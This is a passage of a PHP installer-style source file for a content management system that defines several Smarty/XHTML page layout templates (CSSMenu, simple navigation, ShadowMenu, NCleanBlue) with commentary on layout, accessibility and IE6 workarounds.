module='News' assign='havenews'}{if \$havenews}{cms_module module=News  number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n            </div>\n{* End News *}\n\n          </div>\n        </div>\n{* End Sidebar *}\n\n{* Start Content Area, the back1, back2, back3, hold the 3 outside images, main holds the 4th one, to make the box complete, if the template were fixed width not fluid we could use just 2 divs and 2 images, 1 top 1 bottom *}\n        <div class="back1">\n          <div class="back2">\n            <div class="back3">\n              <div id="main">\n                <h2>{title}</h2>\n                {content}\n                <br />{* to insure space below content *}\n\n{* Start relational links *}\n{* note this is the right side, when you float: divs you need to have float: right; divs first *}\n            <div class="right49">\n              <p>{anchor anchor='main' text='^ Top'}</p>\n            </div>\n            <div class="left49">\n              <p>{cms_selflink dir="previous"}\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n\n              <br />\n              {cms_selflink dir="next"}\n              </p>\n            </div>\n{* End relational links *}\n\n                <hr class="accessibility" />\n                <div class="clear"></div>\n              </div>\n            </div>\n          </div>\n        </div>\n{* End Content Area *}\n\n      </div>\n{* End Content *}\n\n{* Start Footer. Edit the footer in the Global Content Block called "footer" *}\n      <div class="footback">\n        <div id="footer">\n{* stylesheet  "Navigation FatFootMenu" *}\n          <div id="fooleft">\n          {Navigator loadprops=0}\n          </div>\n          <div id="footrt">\n          {global_content name='footer'}\n          </div>\n          <div class="clear"></div>\n        </div>\n      </div>\n{* End Footer *}\n\n    </div>\n{* end pagewrapper *}\n\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('CSSMenu top + 2 columns'); // id = 16
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('This is a drop-down menu that is using only CSS (although some Javascript is required for Internet Explorer 6, note: IE6 will not let you use 2 of these menu types in a template at the same time as the second one will fail to open). It can be either vertical or horizontal.');
$template->set_type($page_template_type);
$template->save();
$css_menutop_2col_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n\n  <head>\n    <title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n {metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n {cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to it *}\n\n {cms_selflink dir="start" rellink=1}\n {cms_selflink dir="prev" rellink=1}\n {cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optimization *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n {literal}\n<script type="text/JavaScript">\n<!--\n//pass min and max - measured against window width\nfunction P7_MinMaxW(a,b){\nvar nw="auto",w=document.documentElement.clientWidth;\nif(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;\n}\n//-->\n</script>\n    <!--[if lte IE 6]>\n    <style type="text/css">\n    #pagewrapper {width:expression(P7_MinMaxW(720,1200));}\n    #container {height: 1%;}\n    </style>\n    <![endif]-->\n    {/literal}\n{* The min and max page width for Internet Explorer is set here. For other browsers it's in the stylesheet "Layout Left sidebar + 1 column" *}\n\n  </head>\n  <body>\n    <div id="pagewrapper">\n\n{* start accessibility skip links, anything with the class of accessibility is hidden with CSS from visual browsers *}\n      <ul class="accessibility">\n        <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n        <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n      </ul>\n{* end accessibility skip links *}\n\n      <hr class="accessibility" />\n{* anything with class="accessibility is hidden for visual browsers by CSS *}\n\n{* Start Header, with logo image that links to the default start page. Logo image is changed in the stylesheet  "Layout Left sidebar + 1 column" *}\n      <div id="header">\n\n{* this holds the name of the site on the right side *}\n        <h2 class="headright">{sitename}</h2>\n\n{* this holds a link back to home page and the header left image/logo, text is hidden using CSS *}\n        <h1>{cms_selflink dir="start" text="\$sitename"}</h1> \n       \n        <hr class="accessibility" />\n      </div>\n{* End Header *}\n\n{* Start Search, the input "Submit" is using an image, CSS: input.search-button *}\n      <div id="search">\n      {Search}\n      </div>\n{* End Search *}\n\n{* Start Breadcrumbs *}\n      <div class="crbk">\n{* holds the right image, we need 2 divs to be able to make this site fluid, if it was fixed width we could use one div, one image  *}\n\n        <div class="breadcrumbs">\n        {nav_breadcrumbs root='Home'}\n          <hr class="accessibility" />\n        </div>\n      </div>\n{* End Breadcrumbs *}\n\n{* Start Content (Navigation and Content columns) *}\n      <div id="content">\n\n{* Start Sidebar, 2 divs one for top image one for bottom image *}\n        <div id="sidebar">\n          <div id="sidebara">\n\n{* Start Navigation, stylesheet  "Navigation Simple - Vertical" *}\n            <div id="menu_vert">\n              <h2 class="accessibility">Navigation</h2>\n              {Navigator loadprops=0 template='Simple Navigation' collapse='1'}\n            </div>\n{* End Navigation *}\n\n{* Start News, style sheet "Module News" *}\n            <div id="news">\n              <h2>News</h2>\n              {module_available module='News' assign='havenews'}{if \$havenews}{cms_module module=News number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n            </div>\n{* End News *}\n\n          </div>\n        </div>\n{* End Sidebar *}\n\n{* Start Content Area *}\n{* again 2 divs to hold top and bottom images, back is set to go to the right side then the main is set to come off the right side *}\n        <div class="back">        \n          <div id="main">\n            <h2>{title}</h2>\n            {content}\n            <br />\n{* this break is just to make sure we get space after the content *}\n\n{* Start relational links *}\n{* note this is the right side, when you float: divs you need to have float: right; divs first *}\n            <div class="right49">\n              <p>{anchor anchor='main' text='^ Top'}</p>\n            </div>\n\n            <div class="left49">\n              <p>{cms_selflink dir="previous"}\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n\n              <br />\n              {cms_selflink dir="next"}\n              </p>\n            </div>\n{* End relational links *}\n\n            <hr class="accessibility" />\n          </div>\n        </div>\n{* End Content Area *}\n\n        <div class="clear"></div>\n{* this is to make sure the 2 divs stay tight *}\n\n      </div>\n{* End Content *}\n\n{* Start Footer. Edit the footer in the Global Content Block called "footer" *}\n      <div class="footback">\n        <div id="footer">\n{* stylesheet  "Navigation FatFootMenu" *}\n          <div id="fooleft">\n          {Navigator loadprops=0}\n          </div>\n          <div id="footrt">\n          {global_content name='footer'}\n          </div>\n          <div class="clear"></div>\n        </div>\n      </div>\n{* End Footer *}\n\n    </div>\n{* end pagewrapper *}\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('Left simple navigation + 1 column'); // id = 17
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('This template has the menu in left sidebar. The menu is using the Simple Navigation menu template. It is styled in the stylesheet called Navigation Simple - Vertical.');
$template->set_type($page_template_type);
$template->save();
$leftsimple_1col_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n\n  <head>\n    <title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n {metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n {cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to it *}\n\n {cms_selflink dir="start" rellink=1}\n {cms_selflink dir="prev" rellink=1}\n {cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optimization *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n {literal}\n<script type="text/JavaScript">\n<!--\n//pass min and max - measured against window width\nfunction P7_MinMaxW(a,b){\nvar nw="auto",w=document.documentElement.clientWidth;\nif(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;\n}\n//-->\n</script>\n    <!--[if lte IE 6]>\n    <style type="text/css">\n    #pagewrapper {width:expression(P7_MinMaxW(720,950));}\n    #container {height: 1%;}\n    </style>\n    <![endif]-->\n    {/literal}\n{* The min and max page width for Internet Explorer is set here. For other browsers it's in the stylesheet "Layout Top menu + 2 columns" *}\n\n  </head>\n  <body>\n    <div id="pagewrapper">\n\n{* start accessibility skip links, anything with the class of accessibility is hidden with CSS from visual browsers *}\n      <ul class="accessibility">\n        <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n        <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n      </ul>\n{* end accessibility skip links *}\n\n      <hr class="accessibility" />\n{* Horizontal ruler that is hidden for visual browsers by CSS *\n}\n{* Start Header, with logo image that links to the default start page. Logo image is changed in the stylesheet  "Layout Top menu + 2 columns" *}\n      <div id="header">\n\n{* this holds the name of the site on the right side *}\n        <h2 class="headright">{sitename}</h2>\n\n{* this holds a link back to home page and the header left image/logo, text is hidden using CSS *}\n        <h1>{cms_selflink dir="start" text="\$sitename"}</h1>\n        <hr class="accessibility" />\n      </div>\n{* End Header *}\n\n{* Start Navigation *}\n      <div id="menu_horiz">\n{* stylesheet  "Navigation Simple - Horizontal" *}\n        <h2 class="accessibility">Navigation</h2>\n        {Navigator loadprops=0 template='Simple Navigation' number_of_levels='1'}\n        <hr class="accessibility" />\n      </div>\n{* End Navigation *}\n{* Start Search, the input "Submit" is using an image, CSS: input.search-button *}\n      <div id="search">\n      {Search}\n      </div>\n{* End Search *}\n\n{* Start Breadcrumbs *}\n      <div class="crbk">\n{* holds the right image, we need 2 divs to be able to make this site fluid, if it was fixed width we could use one div, one image  *}\n\n        <div class="breadcrumbs">\n        {nav_breadcrumbs root='Home'}\n          <hr class="accessibility" />\n        </div>\n      </div>\n{* End Breadcrumbs *}\n\n{* Start Content (Navigation and Content columns) *}\n      <div id="content">\n\n{* Start Sidebar, 2 divs one for top image one for bottom image *}\n        <div id="sidebar">\n          <div id="sidebara">\n\n{* Start Sub Navigation, stylesheet  "Navigation Simple - Vertical" *}\n            <div id="menu_vert">\n              <h2 class="accessibility">Sub Navigation</h2>\n              {Navigator loadprops=0 template='Simple Navigation' start_level='2' collapse='1'}\n                <hr class="accessibility" />\n            </div>\n{* End Sub Navigation *}\n\n{* Start News, style sheet "Module News" *}\n            <div id="news">\n              <h2>News</h2>\n              {module_available module='News' assign='havenews'}{if \$havenews}{cms_module module=News number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n            </div>\n{* End News *}\n\n          </div>\n        </div>\n{* End Sidebar *}\n\n{* Start Content Area, the back1, back2, back3, hold the 3 outside images, main holds the 4th one, to make the box complete, if the template were fixed width not fluid we could use just 2 divs and 2 images, 1 top 1 bottom *}\n        <div class="back1">\n          <div class="back2">\n            <div class="back3">\n              <div id="main">\n                <h2>{title}</h2>\n                {content}\n                <br />{* to insure space below content *}\n\n{* Start relational links *}\n{* note this is the right side, when you float: divs you need to have float: right; divs first *}\n            <div class="right49">\n              <p>{anchor anchor='main' text='^ Top'}</p>\n            </div>\n            <div class="left49">\n              <p>{cms_selflink dir="previous"}\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n\n              <br />\n              {cms_selflink dir="next"}\n              </p>\n            </div>\n{* End relational links *}\n\n                <hr class="accessibility" />\n                <div class="clear"></div>\n              </div>\n            </div>\n          </div>\n        </div>\n{* End Content Area *}\n\n      </div>\n{* End Content *}\n\n{* Start Footer. Edit the footer in the Global Content Block called "footer" *}\n      <div class="footback">\n        <div id="footer">\n{* stylesheet  "Navigation FatFootMenu" *}\n          <div id="fooleft">\n          {Navigator loadprops=0}\n          </div>\n          <div id="footrt">\n          {global_content name='footer'}\n          </div>\n          <div class="clear"></div>\n        </div>\n      </div>\n{* End Footer  *}\n\n    </div>\n{* end pagewrapper *}\n\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('Top simple navigation + left subnavigation + 1 column'); // id = 18
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('With the Menu Manager you can easily split the navigation in two parts. On this page the top level in the page hierarchy is displayed horizontally and depending on what page is displayed a localized sub-menu is displayed vertically to the left.');
$template->set_type($page_template_type);
$template->save();
$topsimple_leftsubnav_1col_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n\n  <head>\n    <title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n {metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n {cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to it *}\n\n {cms_selflink dir="start" rellink=1}\n {cms_selflink dir="prev" rellink=1}\n {cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optimization *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n {literal}\n<script type="text/JavaScript">\n<!--\n//pass min and max - measured against window width\nfunction P7_MinMaxW(a,b){\nvar nw="auto",w=document.documentElement.clientWidth;\nif(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;\n}\n//-->\n</script>\n    <!--[if lte IE 6]>\n    <style type="text/css">\n    #pagewrapper {width:expression(P7_MinMaxW(720,950));}\n    #container {height: 1%;}\n    </style>\n    <![endif]-->\n    {/literal}\n{* The min and max page width for Internet Explorer is set here. For other browsers it's in the stylesheet "Layout Top menu + 2 columns" *}\n\n    <!--[if lte IE 6]>\n    <script type="text/javascript" src="modules/MenuManager/CSSMenu.js"></script>\n    <![endif]--> \n{* The above JavaScript is required for CSSMenu to work in IE *}\n\n  </head>\n  <body>\n    <div id="pagewrapper">\n\n{* start accessibility skip links, anything with the class of accessibility is hidden with CSS from visual browsers *}\n      <ul class="accessibility">\n        <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n        <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n      </ul>\n{* end accessibility skip links *}\n\n      <hr class="accessibility" />\n{* Horizontal ruler that is hidden for visual browsers by CSS *}\n\n{* Start Header, with logo image that links to the default start page. Logo image is changed in the stylesheet  "Layout Top menu + 2 columns" *}\n      <div id="header">\n\n{* this holds the name of the site on the right side *}\n        <h2 class="headright">{sitename}</h2>\n\n{* a link back to home page and the header left image/logo, text is hidden using CSS *}\n        <h1>{cms_selflink dir="start" text="\$sitename"}</h1>        \n        <hr class="accessibility" />\n      </div>\n{* End Header *}\n\n{* Start Navigation, stylesheet "Navigation ShadowMenu - Horizontal" *}\n      <div id="menu_vert">\n        <h2 class="accessibility">Navigation</h2>\n        {Navigator loadprops=0 template='cssmenu_ulshadow'}\n        <hr class="accessibility" />\n      </div>\n{* End Navigation *}\n\n{* Start Search, the input "Submit" is using an image, CSS: input.search-button *}\n      <div id="search">\n      {Search}\n      </div>\n{* End Search *}\n\n{* Start Breadcrumbs *}\n      <div class="crbk">\n{* holds the right image, we need 2 divs to be able to make this site fluid, if it was fixed width we could use one div, one image  *}\n\n        <div class="breadcrumbs">\n        {nav_breadcrumbs root='Home'}\n          <hr class="accessibility" />\n        </div>\n      </div>\n{* End Breadcrumbs *}\n\n{* Start Content *}\n      <div id="content">\n\n{* Start Sidebar *}\n        <div id="sidebar">\n          <div id="sidebarb">\n          {content block='Sidebar'}\n\n{* Start News, stylesheet  "Module News" *}\n            <div id="news">\n              <h2>News</h2>\n              {module_available module='News' assign='havenews'}{if \$havenews}{cms_module module=News number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n            </div>\n{* End News *}\n\n          </div>\n        </div>\n{* End Sidebar *}\n\n{* Start Content Area, the back1, back2, back3, hold the 3 outside images, main holds the 4th one, to make the box complete, if the template were fixed width not fluid we could use just 2 divs and 2 images, 1 top 1 bottom *}\n        <div class="back1">\n          <div class="back2">\n            <div class="back3">\n              <div id="main">\n                <h2>{title}</h2>\n                {content}\n                <br />{* to insure space below content *}\n\n{* Start relational links *}\n{* note this is the right side, when you float: divs you need to have float: right; divs first *}\n            <div class="right49">\n              <p>{anchor anchor='main' text='^ Top'}</p>\n            </div>\n            <div class="left49">\n              <p>{cms_selflink dir="previous"}\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n\n              <br />\n              {cms_selflink dir="next"}\n              </p>\n            </div>\n{* End relational links *}\n\n                <hr class="accessibility" />\n                <div class="clear"></div>\n              </div>\n            </div>\n          </div>\n        </div>\n{* End Content Area *}\n\n      </div>\n{* End Content *}\n\n{* Start Footer. Edit the footer in the Global Content Block called "footer" *}\n      <div class="footback">\n        <div id="footer">\n{* stylesheet  "Navigation FatFootMenu" *}\n          <div id="fooleft">\n          {Navigator loadprops=0}\n          </div>\n          <div id="footrt">\n          {global_content name='footer'}\n          </div>\n          <div class="clear"></div>\n        </div>\n      </div>\n{* End Footer *}\n\n    </div>\n{* end pagewrapper *}\n\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('ShadowMenu Tab + 2 columns'); // id = 20
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('Using the same menu template as the previous theme. We changed the child ul CSS to use a different top image. This involves changing some of the margin and padding as the images are a different shape. Note the difference in the second level and third level ul images, one has an arrow up and the other has an arrow left.');
$template->set_type($page_template_type);
$template->save();
$shadowmenu_tab_2col_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n\n  <head>\n    <title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n {metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n {cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to it *}\n\n {cms_selflink dir="start" rellink=1}\n {cms_selflink dir="prev" rellink=1}\n {cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optimization *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n {literal}\n<script type="text/JavaScript">\n<!--\n//pass min and max - measured against window width\nfunction P7_MinMaxW(a,b){\nvar nw="auto",w=document.documentElement.clientWidth;\nif(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;\n}\n//-->\n</script>\n    <!--[if lte IE 6]>\n    <style type="text/css">\n    #pagewrapper {width:expression(P7_MinMaxW(720,950));}\n    #container {height: 1%;}\n    </style>\n    <![endif]-->\n    {/literal}\n{* The min and max page width for Internet Explorer is set here. For other browsers it's in the stylesheet "Layout Top menu + 2 columns" *}\n\n    <!--[if lte IE 6]>\n    <script type="text/javascript" src="modules/MenuManager/CSSMenu.js"></script>\n    <![endif]--> \n{* The above JavaScript is required for CSSMenu to work in IE *}\n\n  </head>\n  <body>\n    <div id="pagewrapper">\n\n{* start accessibility skip links, anything with the class of accessibility is hidden with CSS from visual browsers *}\n      <ul class="accessibility">\n        <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n        <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n      </ul>\n{* end accessibility skip links *}\n\n      <hr class="accessibility" />\n{* Horizontal ruler that is hidden for visual browsers by CSS *}\n\n{* Start Header, with logo image that links to the default start page. Logo image is changed in the stylesheet  "Layout Left sidebar + 1 column" *}\n      <div id="header">\n\n{* this holds the name of the site on the right side *}\n        <h2 class="headright">{sitename}</h2>\n\n{* this holds a link back to home page and the header left image/logo, text is hidden using CSS *}\n        <h1>{cms_selflink dir="start" text="\$sitename"}</h1>        \n        <hr class="accessibility" />\n      </div>\n{* End Header *}\n\n{* Start Search, the input "Submit" is using an image, CSS: input.search-button *}\n      <div id="search">\n      {Search}\n      </div>\n{* End Search *}\n\n{* Start Breadcrumbs *}\n      <div class="crbk">\n{* holds the right image, we need 2 divs to be able to make this site fluid, if it was fixed width we could use one div, one image  *}\n\n        <div class="breadcrumbs">\n        {nav_breadcrumbs root='Home'}\n          <hr class="accessibility" />\n        </div>\n      </div>\n{* End Breadcrumbs *}\n\n{* Start Content (Navigation and Content columns) *}\n      <div id="content">\n\n{* Start Sidebar, 2 divs one for top image one for bottom image *}\n        <div id="sidebar">\n          <div id="sidebara">\n\n{* Start Navigation, stylesheet  "Navigation ShadowMenu - Vertical" *}\n            <h2 class="accessibility">Navigation</h2>\n            {Navigator loadprops=0 template='cssmenu_ulshadow'}\n            <hr class="accessibility" />\n\n{* Start News, stylesheet  "Module News" *}\n            <div id="news">\n              <h2>News</h2>\n              {module_available module='News' assign='havenews'}{if \$havenews}{cms_module module=News number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n            </div>\n{* End News *}\n\n          </div>\n        </div>\n{* End Sidebar *}\n\n{* Start Content Area, the back1, back2, back3, hold the 3 outside images, main holds the 4th one, to make the box complete, if the template were fixed width not fluid we could use just 2 divs and 2 images, 1 top 1 bottom *}\n        <div class="back1">\n          <div class="back2">\n            <div class="back3">\n              <div id="main">\n                <h2>{title}</h2>\n                {content}\n                <br />{* to insure space below content *}\n\n{* Start relational links *}\n{* note this is the right side, when you float: divs you need to have float: right; divs first *}\n            <div class="right49">\n              <p>{anchor anchor='main' text='^ Top'}</p>\n            </div>\n            <div class="left49">\n              <p>{cms_selflink dir="previous"}\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n\n              <br />\n              {cms_selflink dir="next"}\n              </p>\n            </div>\n{* End relational links *}\n\n                <hr class="accessibility" />\n                <div class="clear"></div>\n              </div>\n            </div>\n          </div>\n        </div>\n{* End Content Area *}\n\n      </div>\n{* End Content *}\n\n{* Start Footer. Edit the footer in the Global Content Block called "footer" *}\n      <div class="footback">\n        <div id="footer">\n{* stylesheet  "Navigation FatFootMenu" *}\n          <div id="fooleft">\n          {Navigator loadprops=0}\n          </div>\n          <div id="footrt">\n          {global_content name='footer'}\n          </div>\n          <div class="clear"></div>\n        </div>\n      </div>\n{* End Footer *}\n\n    </div>\n{* end pagewrapper *}\n\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('ShadowMenu left + 1 column'); // id = 21
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('Using the same menu template as the previous theme. We changed the child ul CSS to use a different top image. This involves changing some of the margin and padding as the images are a different shape. Note the difference in the second level and third level ul images, one has an arrow up and the other has an arrow left.');
$template->set_type($page_template_type);
$template->save();
$shadowmenu_left_1col_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\n"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n  <head>\n{if isset(\$canonical)}<link rel="canonical" href="{\$canonical}" />{elseif isset(\$content_obj)}<link rel="canonical" href="{\$content_obj->GetURL()}" />{/if}\n\n<title>{title} | {sitename}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n{metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n{cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to *}\n\n{cms_selflink dir="start" rellink=1}\n{cms_selflink dir="prev" rellink=1}\n{cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optmization *}\n\n<!--[if IE 6]>\n<script type="text/javascript" src="modules/MenuManager/CSSMenu.js"></script>\n<![endif]-->\n{* The above JavaScript is required for Menu - NCleanBlue-css to work in IE6 *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n{* IE6 png fix *}\n{literal}\n<!--[if IE 6]>\n<script type="text/javascript"  src="uploads/NCleanBlue/js/ie6fix.js"></script>\n<script type="text/javascript">\n // argument is a CSS selector\n DD_belatedPNG.fix('.sbar-top,.sbar-bottom,.main-top,.main-bottom,#version');\n</script>\n<style type="text/css">\n/* enable background image caching in IE6 */\nhtml {filter:expression(document.execCommand("BackgroundImageCache", false, true));} \n</style>\n<![endif]-->\n{/literal}\n\n  </head>\n  <body>\n    <div id="ncleanblue">\n      <div id="pagewrapper" class="core-wrap-960 core-center">\n{* start accessibility skip links *}\n        <ul class="accessibility">\n          <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n          <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n        </ul>\n{* end accessibility skip links *}\n        <hr class="accessibility" />\n{* Horizontal ruler that is hidden for visual browsers by CSS *}\n\n{* Start Header, with logo image that links to the default start page *}\n        <div id="header" class="util-clearfix">\n{* logo image that links to the default start page. Logo image is changed in the style sheet  "Layout NCleanBlue" *}\n          <div id="logo" class="core-float-left">\n            {cms_selflink dir="start" text="\$sitename"}\n          </div>\n          \n{* Start Search, the input "Submit" is using an image, CSS: div#search input.search-button *}\n          <div id="search" class="core-float-right">\n            {Search search_method="post"}\n          </div>\n{* End Search *}\n          <span class="util-clearb">&nbsp;</span>\n          \n{* Start Navigation, style sheet  "Layout NCleanBlue", starting at Menu  ROOT *}\n          <h2 class="accessibility util-clearb">Navigation</h2>\n{* anything class="accessibility" is hidden for visual browsers by CSS *}\n          <div class="page-menu util-clearfix">\n          {Navigator loadprops=0 template='cssmenu_ulshadow'}\n          </div>\n          <hr class="accessibility util-clearb" />\n{* End Navigation *}\n\n        </div>\n{* End Header *}\n\n{* Start Content (Navigation and Content columns) *}\n        <div id="content" class="util-clearfix"> \n\n{* Start Optional tag CMS Version Information, also is a good example how smarty works, the big star that holds the version number, you may remove it here and the style sheet where it is marked. *}\n          <div title="CMS - {cms_version} - {cms_versionname}" id="version">\n          {capture assign='cms_version'}{cms_version|lower}{/capture}{"/-([a-z]).*/"|preg_replace:"":\$cms_version}\n          </div>\n{* End Optional tag  *}\n\n{* Start Bar *}\n          <div id="bar" class="util-clearfix">\n{* Start Breadcrumbs, a bit of letting you know where your at *}\n            <div class="breadcrumbs core-float-right">\n              {nav_breadcrumbs root='Home'}\n            </div>\n{* End Breadcrumbs *}\n\n            <hr class="accessibility util-clearb" />\n          </div>\n{* End Bar *}\n\n{* Start left side *}\n          <div id="left" class="core-float-left">\n            <div class="sbar-top">\n              <h2 class="sbar-title">News</h2>\n            </div>\n            <div class="sbar-main">\n{* Start News *}\n              <div id="news">\n              {module_available module='News' assign='havenews'}{if \$havenews}{cms_module module=News number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n              </div>\n              <img class="screen" src="uploads/NCleanBlue/screen-1.6.jpg" width="139" height="142" title="CMS - {cms_version} - {cms_versionname}" alt="CMS - {cms_version} - {cms_versionname}" />\n{* End News *} \n            </div>\n            <span class="sbar-bottom">&nbsp;</span> \n          </div>\n{* End left side *}\n\n{* Start Content Area, right side *}\n          <div id="main"  class="core-float-right">\n\n{* main top, holds top image *}\n            <div class="main-top">\n              </div> \n            \n{* main content *}\n            <div class="main-main util-clearfix">\n              <h1 class="title">{title}</h1>\n            {content}\n            </div>\n            \n{* Start main bottom and relational links *}\n            <div class="main-bottom">\n              <div class="right49 core-float-right">\n              {anchor anchor='main' text='^&nbsp;&nbsp;Top'}\n              </div>\n              <div class="left49 core-float-left">\n                <span>\n                  {cms_selflink dir="previous"}&nbsp;\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n                </span>\n                <span>\n                  {cms_selflink dir="next"}&nbsp;\n                </span>\n              </div>\n{* End relational links *}\n\n              <hr class="accessibility" />\n            </div>\n{* End main bottom *}\n\n          </div>\n{* End Content Area, right side *}\n\n        </div>\n{* End Content *}\n\n      </div>\n{* end pagewrapper *}\n      <span class="util-clearb">&nbsp;</span>\n      \n{* Start Footer *}\n      <div id="footer-wrapper">\n        <div id="footer" class="core-wrap-960">\n{* first foot menu *}\n          <div class="block core-float-left">\n            {Navigator loadprops=0 template='minimal_menu'  number_of_levels='1'}\n          </div>\n          \n{* second foot menu if active page has children *}\n          <div class="block core-float-left">\n            {Navigator loadprops=0 template='minimal_menu'  start_level="2"}\n          </div>\n          \n{* edit the footer in the Global Content 